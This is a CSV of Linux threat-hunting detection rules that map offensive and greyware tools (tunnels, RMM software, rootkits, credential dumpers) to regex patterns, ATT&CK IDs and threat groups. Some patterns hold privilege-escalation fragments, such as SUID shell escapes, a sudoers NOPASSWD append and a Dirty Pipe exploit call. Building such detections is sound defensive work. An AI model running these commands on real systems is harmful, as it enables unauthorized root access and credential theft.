"*/etc/pulseway/config.xml*",".{0,1000}\/etc\/pulseway\/config\.xml.{0,1000}","greyware_tool_keyword","Pulseway","Pulseway - remote monitoring and management tool designed for IT administrators to monitor and manage their IT systems and infrastructure remotely - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.pulseway.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/remoteit/*",".{0,1000}\/etc\/remoteit\/.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#linux","N/A","10","10","42","11","2024-11-26T19:36:31Z","2019-01-12T00:59:20Z"
"*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","933","37","2024-12-02T17:53:56Z","2024-04-03T13:32:11Z"
"*/etc/reverst/*",".{0,1000}\/etc\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","933","37","2024-12-02T17:53:56Z","2024-04-03T13:32:11Z"
"*/etc/shadowsocks-rust*",".{0,1000}\/etc\/shadowsocks\-rust.{0,1000}","greyware_tool_keyword","shadowsocks","Rust port - shadowsocks is a fast tunnel proxy that helps you bypass firewalls","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/shadowsocks/shadowsocks-rust","1","0","#linux","N/A","10","10","8751","1194","2024-12-07T22:26:08Z","2014-10-15T11:02:36Z"
"*/etc/sshuttle*",".{0,1000}\/etc\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","#linux","N/A","10","10","11836","732","2024-12-03T20:16:35Z","2014-09-15T04:51:13Z"
"*/etc/sudoers.d/ebpfbackdoor*",".{0,1000}\/etc\/sudoers\.d\/ebpfbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/etc/sv/tor/log*",".{0,1000}\/etc\/sv\/tor\/log.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/systemd/gsc*",".{0,1000}\/etc\/systemd\/gsc.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/etc/systemd/system/anydesk.service*",".{0,1000}\/etc\/systemd\/system\/anydesk\.service.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI - Karakurt - Dispossessor","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","#linux","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/etc/systemd/system/IMDS.service*",".{0,1000}\/etc\/systemd\/system\/IMDS\.service.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","#linux","N/A","8","1","92","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z"
"*/etc/systemd/system/localtunnel.service*",".{0,1000}\/etc\/systemd\/system\/localtunnel\.service.{0,1000}","greyware_tool_keyword","Rust Localtunnels","Localtunnel implementation in Rust - exposes your localhost endpoint to the world","T1090 - T1102 - T1043 - T1071","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/kaichaosun/rlt","1","0","#linux","N/A","7","2","100","13","2024-11-08T17:04:49Z","2022-06-27T05:57:34Z"
"*/etc/systemd/system/sliver.service*",".{0,1000}\/etc\/systemd\/system\/sliver\.service.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","8641","1139","2024-12-03T20:33:10Z","2019-01-17T22:07:38Z"
"*/etc/tor/*.conf*",".{0,1000}\/etc\/tor\/.{0,1000}\.conf.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#linux","N/A","10","10","326","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/xdg/autostart/evilxdg.desktop*",".{0,1000}\/etc\/xdg\/autostart\/evilxdg\.desktop.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/etc/zrok.env*",".{0,1000}\/etc\/zrok\.env.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#linux","N/A","10","10","2747","109","2024-12-06T20:00:36Z","2022-07-18T19:14:51Z"
"*/etc/zrok/*",".{0,1000}\/etc\/zrok\/.{0,1000}","greyware_tool_keyword","zrok","zrok allows users to share tunnels for HTTP TCP and UDP network resources. zrok additionally allows users to easily and rapidly share files - web content and custom resources in a peer-to-peer manner.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/openziti/zrok","1","0","#linux","N/A","10","10","2747","109","2024-12-06T20:00:36Z","2022-07-18T19:14:51Z"
"* /register  /proxy  /proxyport  /proxyusername  /proxypasswd*",".{0,1000}\s\/register\s\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/github.com/*/raw/main/*.bash*",".{0,1000}\/github\.com\/.{0,1000}\/raw\/main\/.{0,1000}\.bash.{0,1000}","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/gt server -c ./config.yml*",".{0,1000}\/gt\sserver\s\-c\s\.\/config\.yml.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#linux","N/A","10","10","123","34","2024-10-30T00:37:47Z","2021-11-29T03:09:56Z"
"*/home/*/.anydesk/*",".{0,1000}\/home\/.{0,1000}\/\.anydesk\/.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI - Karakurt - Dispossessor","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","#linux","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/home/app/wstunnel*",".{0,1000}\/home\/app\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4387","376","2024-11-08T19:39:37Z","2016-05-14T23:58:43Z"
"*/home/boringproxy*",".{0,1000}\/home\/boringproxy.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#linux","N/A","10","10","1233","117","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*/home/daddyShark/BabySh4rk/*",".{0,1000}\/home\/daddyShark\/BabySh4rk\/.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#linux","N/A","10","10","185","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z"
"*/home/kali*",".{0,1000}home\/kali\/Downloads.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/home/lowpriv/*",".{0,1000}\/home\/lowpriv\/.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#linux","N/A","6","6","554","71","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z"
"*/home/pyrdp/*",".{0,1000}\/home\/pyrdp\/.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#linux","can also be used by blueteam as a honeypot","10","10","1551","249","2024-06-12T15:15:49Z","2018-09-07T19:17:41Z"
"*/home/sshuttle*",".{0,1000}\/home\/sshuttle.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","#linux","N/A","10","10","11836","732","2024-12-03T20:16:35Z","2014-09-15T04:51:13Z"
"*/home/tor2web/*",".{0,1000}\/home\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#linux","N/A","9","8","707","176","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z"
"*/home/user/rustdesk*",".{0,1000}\/home\/user\/rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","#linux","N/A","10","10","77219","10497","2024-12-07T14:34:54Z","2020-09-28T15:36:08Z"
"*./exploit /etc/passwd 1 *cat /etc/passwd*",".{0,1000}\.\/exploit\s\/etc\/passwd\s1\s.{0,1000}cat\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xIronGoat/dirty-pipe","1","0","#linux","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z"
"*/ld.so /bin/sh -p*",".{0,1000}\/ld\.so\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/linikatz.git*",".{0,1000}\/linikatz\.git.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*/LinikatzV2/*",".{0,1000}\/LinikatzV2\/.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*/linux-smart-enumeration.git*",".{0,1000}\/linux\-smart\-enumeration\.git.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*/nysm bash*",".{0,1000}\/nysm\sbash.{0,1000}","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","239","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z"
"*/pamspy -p *",".{0,1000}\/pamspy\s\-p\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*/pamspy.git*",".{0,1000}\/pamspy\.git.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*/panix.sh --*",".{0,1000}\/panix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*dnskire ALL=(ALL:ALL) NOPASSWD: ALL*",".{0,1000}dnskire\sALL\=\(ALL\:ALL\)\sNOPASSWD\:\sALL.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","15","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z"
"*dnskire may*(ALL : ALL) NOPASSWD: ALL**",".{0,1000}dnskire\smay.{0,1000}\(ALL\s\:\sALL\)\sNOPASSWD\:\sALL.{0,1000}.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","15","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z"
"*/perf stat /bin/sh -p*",".{0,1000}\/perf\sstat\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/perl -e 'exec \""/bin/sh\""*",".{0,1000}\/perl\s\-e\s\'exec\s\\\""\/bin\/sh\\\"".{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/PEzor.sh *",".{0,1000}\/PEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1868","323","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z"
"*/prepare.sh shell/mod_*.htaccess*",".{0,1000}\/prepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1041","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z"
"*/redpill/bin/*.ps1*",".{0,1000}\/redpill\/bin\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","#linux","N/A","10","3","212","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z"
"*/releases/download/v0.1/pamspy*",".{0,1000}\/releases\/download\/v0\.1\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*/releases/download/v0.2/pamspy*",".{0,1000}\/releases\/download\/v0\.2\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*/releases/latest/download/lse.sh*",".{0,1000}\/releases\/latest\/download\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*/root/.local/bin/spraycharles*",".{0,1000}\/root\/\.local\/bin\/spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","189","29","2024-09-27T03:43:16Z","2018-09-17T11:17:47Z"
"*/rvim -c ':py3 import os*os.execl(\""/bin/sh\*",".{0,1000}\/rvim\s\-c\s\'\:py3\simport\sos.{0,1000}os\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*$EHORUS_HOME/.vnc/passwd*",".{0,1000}\$EHORUS_HOME\/\.vnc\/passwd.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo 'user ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers*",".{0,1000}echo\s\'user\sALL\=\(ALL\)\sNOPASSWD\:ALL\'\s\>\>\s\/etc\/sudoers.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","9","879","155","2024-07-23T13:19:03Z","2022-09-04T10:48:49Z"
"*smbpasswd.py -newpass *",".{0,1000}smbpasswd\.py\s\-newpass\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","1968","190","2024-11-09T16:23:46Z","2020-03-09T19:12:11Z"
"*/sshpass /bin/sh -p*",".{0,1000}\/sshpass\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/start.sh dynamic *",".{0,1000}\/start\.sh\sdynamic\s.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","9","879","155","2024-07-23T13:19:03Z","2022-09-04T10:48:49Z"
"*/stdbuf -i0 /bin/sh -p*",".{0,1000}\/stdbuf\s\-i0\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/sudo_tracer.c*",".{0,1000}\/sudo_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","739","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
"*/sudoers.d/reconFTW*",".{0,1000}\/sudoers\.d\/reconFTW.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","5789","932","2024-11-22T11:41:51Z","2020-12-30T23:52:52Z"
